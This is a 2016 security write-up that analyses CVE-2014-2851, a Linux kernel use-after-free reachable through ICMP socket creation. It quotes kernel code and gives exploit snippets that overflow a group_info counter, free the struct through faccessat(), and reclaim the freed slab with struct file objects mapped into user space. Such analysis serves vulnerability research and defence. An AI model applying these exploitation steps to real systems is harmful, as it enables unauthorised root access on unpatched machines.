Posted on January 2, 2016 at 12:10AM
This is a case study for the use-after-free vulnerability which was assigned CVE-2014-2851 and affected Linux kernels through 3.14.1. First of all, I'd like to thank Thomas for his help and the original write-up and his GitHub PoC.
This bug might not be very practical (it takes a while to overflow a 32-bit integer) but it was an interesting vulnerability from an exploitation point of view. On our test system, the overall runtime to get # was just over 50 minutes :) There is a certain amount of indeterminism caused by RCU callbacks which makes the exploitation more difficult.
Our test system was 32-bit Ubuntu 14.04 LTS (3.13.0-24-generic kernel) SMP. First, we will describe the vulnerability and walk through its exploitation. We will then discuss the challenges encountered in exploiting this bug.
The vulnerable path shown below is reached when an ICMP socket is created. Note that even though standard users (on most Linux distributions) are not allowed to create ICMP sockets, no root privileges are required to reach the vulnerable code:
int ping_init_sock(struct sock *sk)
{
struct net *net = sock_net(sk);
kgid_t group = current_egid();
struct group_info *group_info = get_current_groups(); [1]
int i, j, count = group_info->ngroups;
kgid_t low, high;
inet_get_ping_group_range_net(net, &low, &high);
if (gid_lte(low, group) && gid_lte(group, high)) [2]
return 0;
...
The above path ([1] in particular) is reached when an ICMP socket is created in user space:
socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
The get_current_groups() function in [1] is defined as a macro
in include/linux/cred.h:
#define get_current_groups() \
({ \
struct group_info *__groups; \
const struct cred *__cred; \
__cred = current_cred(); \
__groups = get_group_info(__cred->group_info); \ [3]
__groups; \
})
In [3], the get_group_info() function atomically increments the
group_info usage counter which is defined as a signed integer:
type = struct group_info {
atomic_t usage;
int ngroups;
int nblocks;
kgid_t small_block[32];
kgid_t *blocks[];
}
typedef struct {
int counter;
} atomic_t;
Every time a new ICMP socket is created, the usage counter is incremented by one in [1]. However, for an unprivileged user, the check at [2] will fail (returning 0). Hence, the usage counter is never decremented in this exit path. We can repeatedly create new ICMP sockets overflowing this signed integer (0xffffffff + 1 = 0).
The group_info structure is shared among forked children
processes. When the group usage counter becomes 0, there are a number of paths
in the kernel that may free it. One such path discovered by Thomas is the
faccessat() syscall:
SYSCALL_DEFINE3(faccessat, int, dfd, const char __user *, filename, int, mode)
{
const struct cred *old_cred;
struct cred *override_cred;
int res;
...
override_cred = prepare_creds(); [4]
...
out:
revert_creds(old_cred);
put_cred(override_cred); [5]
return res;
In [4], a new struct cred is allocated and its usage counter
(not to be confused with group_info->usage) is set to 1 and
group_info->usage counter is incremented by 1. The
put_cred in [5] then decrements the cred->usage
counter and calls __put_cred():
static inline void put_cred(const struct cred *_cred)
{
struct cred *cred = (struct cred *) _cred;
validate_creds(cred);
if (atomic_dec_and_test(&(cred)->usage))
__put_cred(cred);
}
An important part is that freeing the cred struct is implemented via RCU [6]:
void __put_cred(struct cred *cred)
{
...
BUG_ON(cred == current->cred);
BUG_ON(cred == current->real_cred);
call_rcu(&cred->rcu, put_cred_rcu); [6]
}
EXPORT_SYMBOL(__put_cred);
The following shows the put_cred_rcu callback function, which
in turn calls put_group_info() in [7] to free the
group_info struct when its usage counter becomes 0:
static void put_cred_rcu(struct rcu_head *rcu)
{
struct cred *cred = container_of(rcu, struct cred, rcu);
...
security_cred_free(cred);
key_put(cred->session_keyring);
key_put(cred->process_keyring);
key_put(cred->thread_keyring);
key_put(cred->request_key_auth);
if (cred->group_info)
put_group_info(cred->group_info); [7]
free_uid(cred->user);
put_user_ns(cred->user_ns);
kmem_cache_free(cred_jar, cred);
}
The put_group_info() function is defined as a macro that
decrements the group_info usage counter and if it reaches 0, frees
the allocated structure:
#define put_group_info(group_info) \
do { \
if (atomic_dec_and_test(&(group_info)->usage)) \
groups_free(group_info); \
} while (0)
It should be obvious by now that it is possible to free the
group_info struct by overflowing its usage counter to 0 and then
calling faccessat() from user space:
// increment the counter close to 0xffffffff (-10 = 0xfffffff6)
for (i = 0; i < -10; i++) {
socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
}
// increment the counter by 1 and try to free it
for (i = 0; i < 100; i++) {
socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
faccessat(0, "/", R_OK, AT_EACCESS);
}
The above code should overflow the usage counter and free the
group_info struct. Since freeing this structure is implemented as an
RCU call, there is a certain amount of indeterminism involved which is
discussed later in the "Challenges" section.
Once the group_info struct is freed, the SLUB allocator will
link it in to the freelist. There are a number of good resources online
describing the implementation of the SLUB allocator and we are not going to
discuss it here. It is sufficient to note that when an object is freed, it is
put in the freelist and its first 4 bytes (32-bit architecture) are overwritten
with a pointer to the next free object in the slab. Hence, the first 4 bytes of
the group_info will get overwritten with a valid kernel memory
address. These first 4 bytes represent the usage counter and we may still
increment this pointer by creating ICMP sockets.
There are two possible scenarios when group_info is freed:
In the former case, the "next" free object pointer of our freed
group_info will be set to NULL. We will concentrate on the latter
case, where this pointer is set to next free object in the slab (this was the
most common case).
On our test system, the group_info struct is 140 bytes in size
and is allocated in the generic kmalloc-192 cache. When a request
to allocate an object of size 128-192 bytes is received (via kmalloc,
kmem_cache_alloc, etc.), the SLUB allocator will traverse the freelist and
allocate memory at the address where our overwritten "usage" counter points
to.
It is possible to "point" this address to user space, by incrementing the usage counter again and overflowing it so it points to some user-space address that we can mmap. For example, given a kernel address 0xf3XXXXXX, adding 0xfffffff results in a user-space address 0x3XXXXXX that we can mmap. In summary, the exploitation procedure can be described as follows:
group_info usage counter close to 0xffffffff by creating ICMP socketsgroup_info via faccessat() && repeatgroup_info will be
overwritten with a valid kernel memory address pointing to the next free object in the slabgroup_info usage counter (by creating more ICMP sockets) until it points to some user-space memory addressThe structure X used in our exploit is the struct file, which
has the same size as group_info and contains a few function
pointers (e.g., file operations *f_op or to be more precise, a
pointer to struct containing function pointers). The file structs
can be allocated, for example, using the following code:
for (i = 0; i < N; i++)
fd = open("/etc/passwd", O_RDONLY);
If more than 1024 file descriptors are required, you can always fork another
process and allocate more file structs.
Once this file struct is allocated in our user-space range
0x3000000-0x4000000, we can simply search this memory range for the first
non-zero byte. This will be the beginning of our file struct:
unsigned *p;
struct file *f = NULL;
// find the file struct
for (p = 0x3000000; p < 0x4000000; p++) {
if (*p) {
f = (struct file *)p;
break;
}
}
From this point onward, the rest of the exploitation procedure is quite trivial.
As mentioned in the "Exploitation" section, there is a certain amount of
indeterminism caused by RCU callbacks. For example,
ping_init_sock() followed by faccessat() in a loop may
not be performed in that order. Ideally, we want the following order:
group_info usage counterfaccessat()However, the RCU callbacks are often accumulated and executed in batches.
The callback function "is called after all the CPUs in the system have gone
through at least one "quiescent" state (such as context switch, idle loop, or
user code).". Hence, it is often the case that a number of
ping_init_sock are executed (overflowing the counter and
incrementing it to > 0), followed by a number of RCU callbacks to
put_cred_rcu(). This results in the group_info
freeing path being skipped. However, we have found a way to order the
aforementioned events of incrementing and checking the usage counter.
Another issue encountered while exploiting this vulnerability is related to the recovery phase. What would happen if another object is requested from the same slab? In this case, we can always set the "next" freelist pointer of our object to NULL. The allocator will then set the freelist pointer to NULL, which in turn, will force the allocator to create a new slab and "forget" about the current slab.
Now what if some object belonging to this particular slab is freed? This presented a real challenge and was implemented as a post-exploitation LKM to fixate the system.
In terms of practicality, this particular vulnerability is probably not
ideal since it takes a while to overflow the 32-bit usage counter :) On our
test system, the overall exploitation time was just over 50 minutes! However,
it is quite reliable (even on SMP platforms) once group_info is
freed.